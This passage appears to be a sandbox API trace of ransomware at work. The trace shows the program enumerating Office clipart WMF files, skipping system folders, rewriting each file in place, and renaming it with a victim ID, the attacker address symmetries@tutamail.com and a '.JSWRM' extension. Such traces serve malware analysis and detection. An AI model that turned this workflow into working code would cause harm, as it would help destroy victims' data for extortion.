(lpString1="BD07804_.WMF", lpString2="..") returned 1 [0074.538] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="...") returned 1 [0074.538] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="windows") returned -1 [0074.539] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="recovery") returned -1 [0074.539] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="perflogs") returned -1 [0074.539] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="documents and settings") returned -1 [0074.539] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.539] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="system volume information") returned -1 [0074.539] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="msocache") returned -1 [0074.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07804_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07804_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD07804_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0074.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07804_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07804_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD07804_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0074.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.539] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4924) returned 1 [0074.539] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1330) returned 0x24c1d0 [0074.539] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1330, lpOverlapped=0x0) returned 1 [0074.541] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.541] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1330, lpOverlapped=0x0) returned 1 [0074.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.541] CloseHandle (hObject=0x460) returned 1 [0074.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0074.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0074.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0074.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0074.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0074.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.542] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0074.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.543] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD07831_.WMF", cAlternateFileName="")) returned 1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2=".") returned 1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="..") returned 1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="...") returned 1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="windows") returned -1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="recovery") returned -1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="perflogs") returned -1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="documents and settings") returned -1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="system volume information") returned -1 [0074.543] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="msocache") returned -1 [0074.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0074.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07831_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07831_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD07831_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0074.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07831_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07831_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD07831_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.544] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4066) returned 1 [0074.544] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfe0) returned 0x24c1d0 [0074.544] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xfe0, lpOverlapped=0x0) returned 1 [0074.545] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.545] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xfe0, lpOverlapped=0x0) returned 1 [0074.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.546] CloseHandle (hObject=0x460) returned 1 [0074.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0074.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0074.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0074.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0074.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0074.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.546] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07831_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07831_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0074.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.547] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD08758_.WMF", cAlternateFileName="")) returned 1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2=".") returned 1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="..") returned 1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="...") returned 1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="windows") returned -1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="recovery") returned -1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="perflogs") returned -1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="documents and settings") returned -1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="system volume information") returned -1 [0074.547] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="msocache") returned -1 [0074.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0074.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08758_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08758_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08758_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0074.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0074.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08758_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08758_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08758_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0074.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.548] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24320) returned 1 [0074.548] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f00) returned 0x24c1d0 [0074.548] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x5f00, lpOverlapped=0x0) returned 1 [0074.551] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.551] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x5f00, lpOverlapped=0x0) returned 1 [0074.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.551] CloseHandle (hObject=0x460) returned 1 [0074.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0074.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0074.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0074.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0074.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0074.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.552] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD08758_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd08758_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0074.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.552] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60ca, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD08773_.WMF", cAlternateFileName="")) returned 1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2=".") returned 1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="..") returned 1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="...") returned 1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="windows") returned -1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="recovery") returned -1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="perflogs") returned -1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="documents and settings") returned -1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="system volume information") returned -1 [0074.552] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="msocache") returned -1 [0074.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0074.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08773_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08773_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD08773_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0074.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0074.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08773_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD08773_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, 